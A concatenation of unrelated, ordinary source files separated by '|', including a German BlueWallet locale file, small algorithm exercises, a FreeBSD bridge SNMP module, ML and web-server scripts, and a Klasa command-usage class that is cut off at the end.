empty_txs2_lightning: '\nTo start using it tap on "manage funds" and topup your balance.',
tap_here_to_buy: 'Klicke hier, um Bitcoin zu kaufen',
},
reorder: {
title: 'Wallets neu ordnen',
},
add: {
title: 'Wallet hinzufügen',
description:
'Du kannst entweder ein Backup einer Paper-Wallet einscannen (im WIF - Wallet Import Format) oder eine neue Wallet erstellen. SegWit Wallets werden standardmäßig unterstützt.',
scan: 'Scannen',
create: 'Erstellen',
label_new_segwit: 'Neue SegWit Wallet',
label_new_lightning: 'Neue Lightning Wallet',
wallet_name: 'Wallet Name',
wallet_type: 'Typ',
or: 'oder',
import_wallet: 'Wallet importieren',
imported: 'Importiert',
coming_soon: 'Demnächst verfügbar',
lightning: 'Lightning',
bitcoin: 'Bitcoin',
},
details: {
title: 'Wallet',
address: 'Adresse',
type: 'Typ',
label: 'Bezeichnung',
destination: 'Zieladresse',
description: 'Beschreibung',
are_you_sure: 'Bist du dir sicher??',
yes_delete: 'Ja, löschen',
no_cancel: 'Nein, abbrechnen',
delete: 'Löschen',
save: 'Sichern',
delete_this_wallet: 'Lösche diese Wallet',
export_backup: 'Exportieren / Backup',
buy_bitcoin: 'Bitcoin kaufen',
show_xpub: 'Wallet XPUB zeigen',
},
export: {
title: 'Wallet exportieren',
},
xpub: {
title: 'Wallet XPUB',
copiedToClipboard: 'In die Zwischenablage kopiert.',
},
import: {
title: 'Importieren',
explanation:
'Gib hier deine mnemonische Phrase, deinen privaten Schlüssel, WIF oder worüber du auch immer verfügst ein. BlueWallet wird bestmöglich dein Format interpretieren und die Wallet importieren',
imported: 'Importiert',
error: 'Fehler beim Import. Ist die Eingabe korrekt?',
success: 'Erfolg',
do_import: 'Importieren',
scan_qr: 'oder QR-Code scannen?',
},
scanQrWif: {
go_back: 'Zurück',
cancel: 'Abbrechen',
decoding: 'Entschlüsseln',
input_password: 'Passwort eingeben',
password_explain: 'Das ist ein mit BIP38 verschlüsselter geheimer Schlüssel',
bad_password: 'Falsches Passwort',
wallet_already_exists: 'Diese Wallet existiert bereits',
bad_wif: 'Falsches WIF',
imported_wif: 'WIF importiert',
with_address: ' mit Adresse ',
imported_segwit: 'SegWit importiert',
imported_legacy: 'Legacy importiert',
imported_watchonly: 'Watch-Only importiert',
},
},
transactions: {
list: {
tabBarLabel: 'Transaktionen',
title: 'Transaktionen',
description: 'Eine Liste eingehender oder ausgehender Transaktionen deiner Wallets',
conf: 'conf',
},
details: {
title: 'Transaktionen',
from: 'Eingehend',
to: 'Ausgehend',
copy: 'Kopieren',
transaction_details: 'Details',
show_in_block_explorer: 'Im Block-Explorer zeigen',
},
},
send: {
header: 'Senden',
details: {
title: 'Transaktion erstellen',
amount_field_is_not_valid: 'Betrageingabe ist nicht korrekt',
fee_field_is_not_valid: 'Gebühreingabe ist nicht korrekt',
address_field_is_not_valid: 'Adresseingabe ist nicht korrekt',
total_exceeds_balance: 'Der zu sendende Betrag ist größer als der verfügbare Betrag.',
create_tx_error: 'Fehler beim Erstellen der Transaktion. Bitte stelle sicher, dass die Adresse korrekt ist.',
address: 'Adresse',
amount_placeholder: 'Betrag (in BTC)',
fee_placeholder: 'plus Gebühr (in BTC)',
note_placeholder: 'Notiz',
cancel: 'Abbrechen',
scan: 'Scan',
send: 'Senden',
create: 'Erstellen',
remaining_balance: 'Verfügbarer Betrag',
},
confirm: {
header: 'Bestätigen',
sendNow: 'Jetzt senden',
},
success: {
done: 'Fertig',
},
create: {
details: 'Details',
title: 'Transaktion erstellen',
error: 'Fehler beim Erstellen der Transaktion. Falsche Adresse oder Betrag?',
go_back: 'Zurück',
this_is_hex: 'Das ist die hexadezimale Darstellung der signierten Transaktion und bereit zum Übertragen an das Netzwerk',
to: 'An',
amount: 'Betrag',
fee: 'Gebühr',
tx_size: 'Größe',
satoshi_per_byte: 'Satoshi pro Byte',
memo: 'Memo',
broadcast: 'Übertragen',
not_enough_fee: 'Gebühr zu gering. Erhöhe die Gebühr',
},
},
receive: {
header: 'Erhalten',
details: {
title: 'Teile diese Adresse mit dem Zahlenden',
share: 'Teilen',
copiedToClipboard: 'In die Zwischenablage kopiert.',
label: 'Beschreibung',
create: 'Create',
setAmount: 'Zu erhaltender Betrag',
},
},
buyBitcoin: {
header: 'Kaufe Bitcoin',
tap_your_address: 'Adresse antippen, um sie in die Zwischenablage zu kopieren:',
copied: 'In die Zwischenablage kopiert!',
},
settings: {
header: 'Einstellungen',
plausible_deniability: 'Glaubhafte Täuschung...',
storage_not_encrypted: 'Speicher nicht verschlüsselt',
storage_encrypted: 'Speicher verschlüsselt',
password: 'Passwort',
password_explain: 'Erstelle das Passwort zum Entschlüsseln des Speichers',
retype_password: 'Passwort wiederholen',
passwords_do_not_match: 'Passwörter stimmen nicht überein',
encrypt_storage: 'Speicher verschlüsseln',
lightning_settings: 'Lightning Einstellungen',
lightning_settings_explain:
'Bitte installier Lndhub, um mit deiner eigenen LND Node zu verbinden' +
' und setz seine URL hier in den Einstellungen. Lass das Feld leer, um Standard- ' +
'LndHub\n (lndhub.io) zu verwenden',
electrum_settings: 'Electrum Settings',
electrum_settings_explain: 'Set to blank to use default',
save: 'Speichern',
about: 'Über',
language: 'Sprache',
currency: 'Währung',
advanced_options: 'Advanced Options',
enable_advanced_mode: 'Enable advanced mode',
},
plausibledeniability: {
title: 'Glaubhafte Täuschung',
help:
'Unter bestimmten Umständen könntest du dazu gezwungen werden, ' +
'dein Passwort preiszugeben. Um deine Bitcoins zu sichern, kann ' +
'BlueWallet einen weiteren verschlüsselten Speicher mit einem ' +
'anderen Passwort erstellen. Unter Druck kannst du das ' +
'zweite Passwort an Fremde weitergeben. Wenn eingegeben, öffnet ' +
'BlueWallet einen anderen Speicher zur Täuschung. Dies wirkt ' +
'auf Fremde täuschend echt und dein Hauptspeicher bleibt geheim ' +
'und sicher.',
help2: 'Der andere Speicher ist voll funktional und man kann einen Minimalbetrag für die Glaubhaftigkeit hinterlegen.',
create_fake_storage: 'Erstelle verschlüsselten Speicher zur Täuschung',
go_back: 'Zurück',
create_password: 'Erstelle ein Passwort',
create_password_explanation: 'Das Passwort für den täuschenden Speicher darf nicht mit dem deines Hauptspeichers übereinstimmen',
password_should_not_match: 'Das Passwort für den täuschenden Speicher darf nicht mit dem deines Hauptspeichers übereinstimmen',
retype_password: 'Passwort wiederholen',
passwords_do_not_match: 'Passwörter stimmen nicht überein. Neuer Versuch',
success: 'Erfolg!',
},
lnd: {
title: 'Beträge verwalten',
choose_source_wallet: 'Wähle eine Wallet als Zahlungsquelle',
refill_lnd_balance: 'Lade deine Lightning Wallet auf',
refill: 'Aufladen',
withdraw: 'Abheben',
placeholder: 'Invoice',
sameWalletAsInvoiceError:
'Du kannst nicht die Rechnung mit der Wallet begleichen, die du für die Erstellung dieser Rechnung verwendet hast.',
},
pleasebackup: {
title: 'Your wallet is created...',
text:
"Please take a moment to write down this mnemonic phrase on a piece of paper. It's your backup you can use to restore the wallet on other device. You can use Electrum wallet on desktop (https://electrum.org/) to restore the same wallet.",
ok: 'OK, I wrote this down!',
},
lndViewInvoice: {
wasnt_paid_and_expired: 'This invoice was not paid for and has expired',
has_been_paid: 'This invoice has been paid for',
please_pay: 'Please pay',
sats: 'sats',
for: 'For:',
additional_info: 'Additional Information',
open_direct_channel: 'Open direct channel with this node:',
},
};
|
from queue import Queue
def truckTour(petrolpumps):
route = Queue()
# put all of the pumps in the queue
for p in petrolpumps:
route.put(p)
start = 0
tank = 0
# keep track of how many pumps we've traversed
traversed = 0
# loop over every pair in the input array
while traversed < len(petrolpumps):
# check how much gas is left after traveling to the next pump
# at the current pump, keep track of gas - distance
pump = route.get()
gas, distance = pump
# update our tank amount with the difference between
# gas and distance
tank += (gas - distance)
# if we see that we have a negative amount of gas left,
if tank < 0:
# that means this pump is not valid
# consider the next pump
start += traversed + 1
# reset the tank
tank = 0
traversed = 0
else:
traversed += 1
# add the pump back to the queue
route.put(pump)
# return the pump index
return start
|
import os
from cfdata.tabular import *
from cfml import *
# datasets
boston = TabularDataset.boston()
prices_file = os.path.join("datasets", "prices.txt")
prices = TabularData(task_type=TaskTypes.REGRESSION).read(prices_file).to_dataset()
breast_cancer = TabularDataset.breast_cancer()
digits = TabularDataset.digits()
column_indices = list(range(digits.num_features))
digits_onehot = TabularData.from_dataset(digits, categorical_columns=column_indices).to_dataset()
# numpy poly fit
Base.make("poly").fit(*prices.xy).visualize1d(*prices.xy)
# linear regression
Base.make("linear_regression").fit(*prices.xy).visualize1d(*prices.xy).plot_loss_curve()
# logistic regression
Base.make("logistic_regression").fit(*breast_cancer.xy).plot_loss_curve()
# multinomial naive bayes
Base.make("multinomial_nb").fit(*digits_onehot.xy)
# gaussian naive bayes
Base.make("gaussian_nb").fit(*breast_cancer.xy)
# linear support vector machine (classification)
Base.make("linear_svc").fit(breast_cancer.x, breast_cancer.y).plot_loss_curve()
# linear support vector machine (regression)
Base.make("linear_svr").fit(boston.x, boston.y).plot_loss_curve()
# support vector machine (classification)
Base.make("svc").fit(breast_cancer.x, breast_cancer.y).plot_loss_curve()
# support vector machine (regression)
Base.make("svr").fit(boston.x, boston.y).plot_loss_curve()
# fully connected neural network (classification)
Base.make("fcnn_clf").fit(*breast_cancer.xy).plot_loss_curve()
# fully connected neural network (regression)
Base.make("fcnn_reg").fit(*boston.xy).plot_loss_curve()
|
const mongoose = require('mongoose');
/**
* Product model schema.
*/
const productSchema = new mongoose.Schema({
name: { type: String, required: true },
price: { type: Number, required: true },
description: { type: String }
});
module.exports = mongoose.model('product', productSchema);
|
'''
Problem:
A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 x 99.
Find the largest palindrome made from the product of two 3-digit numbers which is less than N.
'''
n=int(input())
for i in range(n-1,10000,-1):
temp=str(i)
if(temp==temp[::-1]):
j=999
while(j!=99):
if((i%j==0) and (len(str(i/j))==3)):
print i
exit(0)
j-=1
|
/*-
* SPDX-License-Identifier: BSD-2-Clause-FreeBSD
*
* Copyright (c) 2006 Shteryana Shopova <syrinx@FreeBSD.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* Bridge MIB implementation for SNMPd.
*
* $FreeBSD$
*/
#include <sys/param.h>
#include <sys/queue.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <net/if_mib.h>
#include <net/if_types.h>
#include <errno.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>
#include <bsnmp/snmpmod.h>
#include <bsnmp/snmp_mibII.h>
#define SNMPTREE_TYPES
#include "bridge_tree.h"
#include "bridge_snmp.h"
#include "bridge_oid.h"
static struct lmodule *bridge_module;
/* For the registration. */
static const struct asn_oid oid_dot1Bridge = OIDX_dot1dBridge;
/* The registration. */
static uint reg_bridge;
/* Periodic timer for polling all bridges' data. */
static void *bridge_data_timer;
static void *bridge_tc_timer;
static int bridge_data_maxage = SNMP_BRIDGE_DATA_MAXAGE;
static int bridge_poll_ticks = SNMP_BRIDGE_POLL_INTERVAL * 100;
static int bridge_tc_poll_ticks = SNMP_BRIDGE_TC_POLL_INTERVAL * 100;
/*
* Our default bridge, whose info will be visible under
* the dot1dBridge subtree and functions to set/fetch it.
*/
static char bif_default_name[IFNAMSIZ] = "bridge0";
static struct bridge_if *bif_default;
struct bridge_if *
bridge_get_default(void)
{
struct mibif *ifp;
if (bif_default != NULL) {
/* Walk through the mibII interface list. */
for (ifp = mib_first_if(); ifp != NULL; ifp = mib_next_if(ifp))
if (strcmp(ifp->name, bif_default->bif_name) == 0)
break;
if (ifp == NULL)
bif_default = NULL;
}
return (bif_default);
}
void
bridge_set_default(struct bridge_if *bif)
{
bif_default = bif;
syslog(LOG_ERR, "Set default bridge interface to: %s",
bif == NULL ? "(none)" : bif->bif_name);
}
const char *
bridge_get_default_name(void)
{
return (bif_default_name);
}
static int
bridge_set_default_name(const char *bif_name, uint len)
{
struct bridge_if *bif;
if (len >= IFNAMSIZ)
return (-1);
bcopy(bif_name, bif_default_name, len);
bif_default_name[len] = '\0';
if ((bif = bridge_if_find_ifname(bif_default_name)) == NULL) {
bif_default = NULL;
return (0);
}
bif_default = bif;
return (1);
}
int
bridge_get_data_maxage(void)
{
return (bridge_data_maxage);
}
static void
bridge_set_poll_ticks(int poll_ticks)
{
if (bridge_data_timer != NULL)
timer_stop(bridge_data_timer);
bridge_poll_ticks = poll_ticks;
bridge_data_timer = timer_start_repeat(bridge_poll_ticks,
bridge_poll_ticks, bridge_update_all, NULL, bridge_module);
}
/*
* The bridge module configuration via SNMP.
*/
static int
bridge_default_name_save(struct snmp_context *ctx, const char *bridge_default)
{
if ((ctx->scratch->int1 = strlen(bridge_default)) >= IFNAMSIZ)
return (-1);
if ((ctx->scratch->ptr1 = malloc(IFNAMSIZ)) == NULL)
return (-1);
strncpy(ctx->scratch->ptr1, bridge_default, ctx->scratch->int1);
return (0);
}
int
op_begemot_bridge_config(struct snmp_context *ctx, struct snmp_value *val,
uint sub, uint iidx __unused, enum snmp_op op)
{
switch (op) {
case SNMP_OP_GET:
switch (val->var.subs[sub - 1]) {
case LEAF_begemotBridgeDefaultBridgeIf:
return (string_get(val, bridge_get_default_name(), -1));
case LEAF_begemotBridgeDataUpdate:
val->v.integer = bridge_data_maxage;
return (SNMP_ERR_NOERROR);
case LEAF_begemotBridgeDataPoll:
val->v.integer = bridge_poll_ticks / 100;
return (SNMP_ERR_NOERROR);
}
abort();
case SNMP_OP_GETNEXT:
abort();
case SNMP_OP_SET:
switch (val->var.subs[sub - 1]) {
case LEAF_begemotBridgeDefaultBridgeIf:
/*
* Cannot use string_save() here - requires either
* a fixed-sized or var-length string - not less
* than or equal.
*/
if (bridge_default_name_save(ctx,
bridge_get_default_name()) < 0)
return (SNMP_ERR_RES_UNAVAIL);
if (bridge_set_default_name(val->v.octetstring.octets,
val->v.octetstring.len) < 0)
return (SNMP_ERR_BADVALUE);
return (SNMP_ERR_NOERROR);
case LEAF_begemotBridgeDataUpdate:
if (val->v.integer < SNMP_BRIDGE_DATA_MAXAGE_MIN ||
val->v.integer > SNMP_BRIDGE_DATA_MAXAGE_MAX)
return (SNMP_ERR_WRONG_VALUE);
ctx->scratch->int1 = bridge_data_maxage;
bridge_data_maxage = val->v.integer;
return (SNMP_ERR_NOERROR);
case LEAF_begemotBridgeDataPoll:
if (val->v.integer < SNMP_BRIDGE_POLL_INTERVAL_MIN ||
val->v.integer > SNMP_BRIDGE_POLL_INTERVAL_MAX)
return (SNMP_ERR_WRONG_VALUE);
ctx->scratch->int1 = val->v.integer;
return (SNMP_ERR_NOERROR);
}
abort();
case SNMP_OP_ROLLBACK:
switch (val->var.subs[sub - 1]) {
case LEAF_begemotBridgeDefaultBridgeIf:
bridge_set_default_name(ctx->scratch->ptr1,
ctx->scratch->int1);
free(ctx->scratch->ptr1);
break;
case LEAF_begemotBridgeDataUpdate:
bridge_data_maxage = ctx->scratch->int1;
break;
}
return (SNMP_ERR_NOERROR);
case SNMP_OP_COMMIT:
switch (val->var.subs[sub - 1]) {
case LEAF_begemotBridgeDefaultBridgeIf:
free(ctx->scratch->ptr1);
break;
case LEAF_begemotBridgeDataPoll:
bridge_set_poll_ticks(ctx->scratch->int1 * 100);
break;
}
return (SNMP_ERR_NOERROR);
}
abort();
}
/*
* Bridge mib module initialization hook.
* Returns 0 on success, < 0 on error.
*/
static int
bridge_init(struct lmodule * mod, int argc __unused, char *argv[] __unused)
{
bridge_module = mod;
if (bridge_kmod_load() < 0)
return (-1);
if (bridge_ioctl_init() < 0)
return (-1);
/* Register to get creation messages for bridge interfaces. */
if (mib_register_newif(bridge_attach_newif, bridge_module)) {
syslog(LOG_ERR, "Cannot register newif function: %s",
strerror(errno));
return (-1);
}
return (0);
}
/*
* Bridge mib module finalization hook.
*/
static int
bridge_fini(void)
{
mib_unregister_newif(bridge_module);
or_unregister(reg_bridge);
if (bridge_data_timer != NULL) {
timer_stop(bridge_data_timer);
bridge_data_timer = NULL;
}
if (bridge_tc_timer != NULL) {
timer_stop(bridge_tc_timer);
bridge_tc_timer = NULL;
}
bridge_ifs_fini();
bridge_ports_fini();
bridge_addrs_fini();
return (0);
}
/*
* Bridge mib module start operation.
*/
static void
bridge_start(void)
{
reg_bridge = or_register(&oid_dot1Bridge,
"The IETF MIB for Bridges (RFC 4188).", bridge_module);
bridge_data_timer = timer_start_repeat(bridge_poll_ticks,
bridge_poll_ticks, bridge_update_all, NULL, bridge_module);
bridge_tc_timer = timer_start_repeat(bridge_tc_poll_ticks,
bridge_tc_poll_ticks, bridge_update_tc_time, NULL, bridge_module);
}
static void
bridge_dump(void)
{
struct bridge_if *bif;
if ((bif = bridge_get_default()) == NULL)
syslog(LOG_ERR, "Dump: no default bridge interface");
else
syslog(LOG_ERR, "Dump: default bridge interface %s",
bif->bif_name);
bridge_ifs_dump();
bridge_pf_dump();
}
const struct snmp_module config = {
.comment = "This module implements the bridge mib (RFC 4188).",
.init = bridge_init,
.fini = bridge_fini,
.start = bridge_start,
.tree = bridge_ctree,
.dump = bridge_dump,
.tree_size = bridge_CTREE_SIZE,
};
|
# -*- coding: utf-8 -*-
"""
Let’s say I give you a list saved in a variable:
a = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100].
Write one line of Python that takes this list a and makes a
new list that has only the even elements of this list in it.
"""
a = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
b = [x for x in a if x % 2 == 0] #add number from a to b if it is even
print(a)
print(b)
|
var gulp = require('gulp');
var copy = require('./commands/CopyFiles');
var elixir = require('laravel-elixir');
var config = elixir.config;
/*
|----------------------------------------------------------------
| Copying
|----------------------------------------------------------------
|
| This task offers a simple way to copy files from one place to
| another. That's it. Not any more complicated than that!
|
*/
elixir.extend('copy', function(source, destination) {
return copy(source, destination);
});
|
import _defineProperty from "@babel/runtime/helpers/esm/defineProperty";
function ownKeys(object, enumerableOnly) { var keys = Object.keys(object); if (Object.getOwnPropertySymbols) { var symbols = Object.getOwnPropertySymbols(object); if (enumerableOnly) { symbols = symbols.filter(function (sym) { return Object.getOwnPropertyDescriptor(object, sym).enumerable; }); } keys.push.apply(keys, symbols); } return keys; }
function _objectSpread(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys(Object(source), true).forEach(function (key) { _defineProperty(target, key, source[key]); }); } else if (Object.getOwnPropertyDescriptors) { Object.defineProperties(target, Object.getOwnPropertyDescriptors(source)); } else { ownKeys(Object(source)).forEach(function (key) { Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key)); }); } } return target; }
// Copyright 2017-2021 @axia-js/api-derive authors & contributors
// SPDX-License-Identifier: Apache-2.0
import { catchError, combineLatest, map, of, switchMap } from 'rxjs';
import { isFunction, stringToHex } from '@axia-js/util';
import { memo } from "../util/index.js";
const DEMOCRACY_ID = stringToHex('democrac');
function queryQueue(api) {
return api.query.democracy.dispatchQueue().pipe(switchMap(dispatches => combineLatest([of(dispatches), api.derive.democracy.preimages(dispatches.map(([, hash]) => hash))])), map(([dispatches, images]) => dispatches.map(([at, imageHash, index], dispatchIndex) => ({
at,
image: images[dispatchIndex],
imageHash,
index
}))));
}
function schedulerEntries(api) {
// We don't get entries, but rather we get the keys (triggered via finished referendums) and
// the subscribe to those keys - this means we pickup when the schedulers actually executes
// at a block, the entry for that block will become empty
return api.derive.democracy.referendumsFinished().pipe(switchMap(() => api.query.scheduler.agenda.keys()), switchMap(keys => {
const blockNumbers = keys.map(({
args: [blockNumber]
}) => blockNumber);
return blockNumbers.length ? combineLatest([of(blockNumbers), // this should simply be api.query.scheduler.agenda.multi<Vec<Option<Scheduled>>>,
// however we have had cases on Darwinia where the indices have moved around after an
// upgrade, which results in invalid on-chain data
combineLatest(blockNumbers.map(blockNumber => api.query.scheduler.agenda(blockNumber).pipe( // this does create an issue since it discards all at that block
catchError(() => of(null)))))]) : of([[], []]);
}));
}
function queryScheduler(api) {
return schedulerEntries(api).pipe(switchMap(([blockNumbers, agendas]) => {
const result = [];
blockNumbers.forEach((at, index) => {
(agendas[index] || []).filter(opt => opt.isSome).forEach(optScheduled => {
const scheduled = optScheduled.unwrap();
if (scheduled.maybeId.isSome) {
const id = scheduled.maybeId.unwrap().toHex();
if (id.startsWith(DEMOCRACY_ID)) {
const [, index] = api.registry.createType('(u64, ReferendumIndex)', id);
const imageHash = scheduled.call.args[0];
result.push({
at,
imageHash,
index
});
}
}
});
});
return result.length ? combineLatest([of(result), api.derive.democracy.preimages(result.map(({
imageHash
}) => imageHash))]) : of([[], []]);
}), map(([infos, images]) => infos.map((info, index) => _objectSpread(_objectSpread({}, info), {}, {
image: images[index]
}))));
}
export function dispatchQueue(instanceId, api) {
return memo(instanceId, () => {
var _api$query$scheduler;
return isFunction((_api$query$scheduler = api.query.scheduler) === null || _api$query$scheduler === void 0 ? void 0 : _api$query$scheduler.agenda) ? queryScheduler(api) : api.query.democracy.dispatchQueue ? queryQueue(api) : of([]);
});
}
|
''' Calculate Inception Moments
Adapted from https://github.com/ajbrock/BigGAN-PyTorch/blob/master/calculate_inception_moments.py
under the MIT license.
This script iterates over the dataset and calculates the moments of the
activations of the Inception net (needed for FID), and also returns
the Inception Score of the training data.
Note that if you don't shuffle the data, the IS of true data will be under-
estimated as it is label-ordered. By default, the data is not shuffled
so as to reduce non-determinism. '''
import os
import shutil
import tempfile
import numpy as np
import smart_open
import torch
import torch.nn.functional as F
import torch.utils.data as data_utils
from torchvision import transforms
from .image_bytes_dataset import ImageBytesDataset
from .trainers.tqdm_newlines import tqdm_class, tqdm_kwargs
from . import inception_utils
def calculate_inception_moments(loader, use_newlines=False, log_iters=10, quiet_logs=False):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
print(f'Using device "{device}"')
print('Loading inception net...')
net = inception_utils.load_inception_net(parallel=False)
net = net.to(device)
pool, logits = [], []
print('Evaluating dataset activations...')
tqdm = tqdm_class(use_newlines)
progress_iter = tqdm(loader, **tqdm_kwargs(quiet_logs, log_iters))
for i, x in enumerate(progress_iter):
x = x.to(device)
with torch.no_grad():
pool_val, logits_val = net(x)
pool += [np.asarray(pool_val.cpu())]
logits += [np.asarray(F.softmax(logits_val, 1).cpu())]
pool, logits = [np.concatenate(item, 0) for item in [pool, logits]]
print('Calculating inception metrics...')
IS_mean, IS_std = inception_utils.calculate_inception_score(logits)
print('Training data from dataset has IS of %5.5f +/- %5.5f' % (IS_mean, IS_std))
# Prepare mu and sigma, save to disk. Remove "hdf5" by default
# (the FID code also knows to strip "hdf5")
print('Calculating means and covariances...')
mu, sigma = np.mean(pool, axis=0), np.cov(pool, rowvar=False)
return mu, sigma
if __name__ == '__main__':
import argparse
p = argparse.ArgumentParser(description='Create image data from a folder.')
p.add_argument('source', help='Root path of dataset')
p.add_argument('destination', help='Output location')
p.add_argument('--batch-size', type=int, default=32)
p.add_argument('--log-iters', type=int, default=10)
p.add_argument('--quiet-logs', action='store_true',
help='Less verbose logs')
p.add_argument('--log-newlines', action='store_true',
help='Use newlines instead of carriage returns in progress bar.')
p.add_argument('--cleanup-inception-model', action='store_true',
help='Delete the pre-trained model after use.')
args = p.parse_args()
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
])
print(f'Loading dataset from {args.source}')
dataset = ImageBytesDataset.from_path(
args.source, transform=transform
)
loader = data_utils.DataLoader(
dataset, batch_size=args.batch_size, shuffle=True, drop_last=True
)
if args.cleanup_inception_model:
model_path = tempfile.mkdtemp()
os.environ['TORCH_HOME'] = model_path
print(f'Setting $TORCH_HOME to {model_path}')
try:
mu, sigma = calculate_inception_moments(
loader, use_newlines=args.log_newlines, quiet_logs=args.quiet_logs,
log_iters=args.log_iters
)
finally:
if args.cleanup_inception_model:
print('Deleting pretrained model...')
shutil.rmtree(model_path)
print(f'Saving calculated means and covariances to "{args.destination}"...')
with smart_open.open(args.destination, 'wb') as outfile:
np.savez(outfile, mu=mu, sigma=sigma)
|
import koa from "koa";
import koaRouter from "koa-router";
import koaBody from "koa-bodyparser";
import { graphqlKoa, graphiqlKoa } from "apollo-server-koa";
import configs from './configs';
import { schema } from "./schemas"
const app = new koa();
const router = new koaRouter();
//post请求
app.use(koaBody())
//设置路由
router.get('/graphql', graphqlKoa({ schema: schema }));
router.post('/graphql', graphqlKoa({ schema: schema }))
router.get('/graphiql', graphiqlKoa({ endpointURL: '/graphql' }));
//使用路由
app.use(router.routes());
app.listen(configs.port, () => {
console.log('app listening on port ' + configs.port);
})
|
#!/usr/bin/env python
"""
Command-line utility for administrative tasks.
# For more information about this file, visit
# https://docs.djangoproject.com/en/2.1/ref/django-admin/
"""
import os
import sys
if __name__ == '__main__':
os.environ.setdefault(
'DJANGO_SETTINGS_MODULE',
'CS50WebProgramming.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
export const MAINNET = 'mainnet'
export const RINKEBY = 'rinkeby'
export const PRODUCTION = 'production'
export const PRE_PRODUCTION = 'pre-production'
export const STAGING = 'staging'
export const DEVELOPMENT = 'development'
export const NETWORK_NAME = 'NETWORK_NAME'
export const NETWORK_VERSION = 'NETWORK_VERSION'
export const NETWORK_URL = 'NETWORK_URL'
export const PUSH_NOTIFICATION_SERVICE_URL = 'PUSH_NOTIFICATION_SERVICE_URL'
export const TRANSACTION_RELAY_SERVICE_URL = 'TRANSACTION_RELAY_SERVICE_URL'
export const ANDROID_APP_URL = 'ANDROID_APP_URL'
export const IOS_APP_URL = 'IOS_APP_URL'
export const TOKEN_LIST_URL = 'TOKEN_LIST_URL'
export const FIREBASE_AUTH_DOMAIN = 'FIREBASE_AUTH_DOMAIN'
export const FIREBASE_DATABASE_URL = 'FIREBASE_DATABASE_URL'
export const FIREBASE_PROJECT_ID = 'FIREBASE_PROJECT_ID'
export const FIREBASE_STORAGE_BUCKET = 'FIREBASE_STORAGE_BUCKET'
export const FIREBASE_MESSAGING_SENDER_ID = 'FIREBASE_MESSAGING_SENDER_ID'
export const FAVICON = 'FAVICON'
|
from pymsbuild._types import *
class DllPackage(PydFile):
r"""Represents a DLL-packed package.
This is the equivalent of a regular `Package`, but the output is a
compiled DLL that exposes submodules and resources using an import hook.
Add `Function` elements to link """
options = {
**PydFile.options,
}
def __init__(self, name, *members, project_file=None, **kwargs):
super().__init__(
name,
*members,
LiteralXML('<Import Project="$(PyMsbuildTargets)\\dllpack.targets" />'),
project_file=project_file,
**kwargs
)
class CFunction:
r"""Represents a function exposed in a DLL-packed package.
The named function must be provided in a `CSourceFile` element and
follow this prototype:
```
PyObject *function(PyObject *module, PyObject *args, PyObject *kwargs)
```
It will be available in the root of the package as the same name.
"""
_ITEMNAME = "DllPackFunction"
def __init__(self, name, **options):
self.name = name
self.options = dict(**options)
def write_member(self, project, group):
group.switch_to("ItemGroup")
project.add_item(self._ITEMNAME, self.name, **self.options)
|
const Usage = require('./Usage');
const CommandPrompt = require('./CommandPrompt');
/**
* Converts usage strings into objects to compare against later
* @extends Usage
*/
class CommandUsage extends Usage {
/**
* @since 0.0.1
* @param {KlasaClient} client The klasa client
* @param {usageString} usageString The usage string for this command
* @param {usageDelim} usageDelim The usage deliminator for this command
* @param {Command} command The command this parsed usage is for
*/
constructor(client, usageString, usageDelim, command) {
super(client, usageString, usageDelim);
/**
* All names and aliases for the command
* @since 0.0.1
* @type {string[]}
*/
this.names = [command.name, ...command.aliases];
/**
* The compiled string for all names/aliases in a usage string
* @since 0.0.1
* @type {string}
*/
this.commands = this.names.length === 1 ? this.names[0] : `《${this.names.join('|')}》`;
/**
* The concatenated string of this.commands and this.deliminatedUsage
* @since 0.0.1
* @type {string}
*/
this.nearlyFullUsage = `${this.commands}${this.deliminatedUsage}`;
}
/**
* Creates a CommandPrompt instance to collect and resolve arguments with
* @since 0.5.0
* @param {KlasaMessage} message The message context from the prompt
* @param {TextPromptOptions} options The options for the prompt
* @returns {CommandPrompt}
*/
createPrompt(message, options = {}) {
return new CommandPrompt(message, this, options);
}
/**
* Creates a full usage string including prefix and commands/aliases for documentation/help purposes
* @since 0.0.1
* @param {KlasaMessage} message The message context for which to generate usage for
* @returns {string}
*/
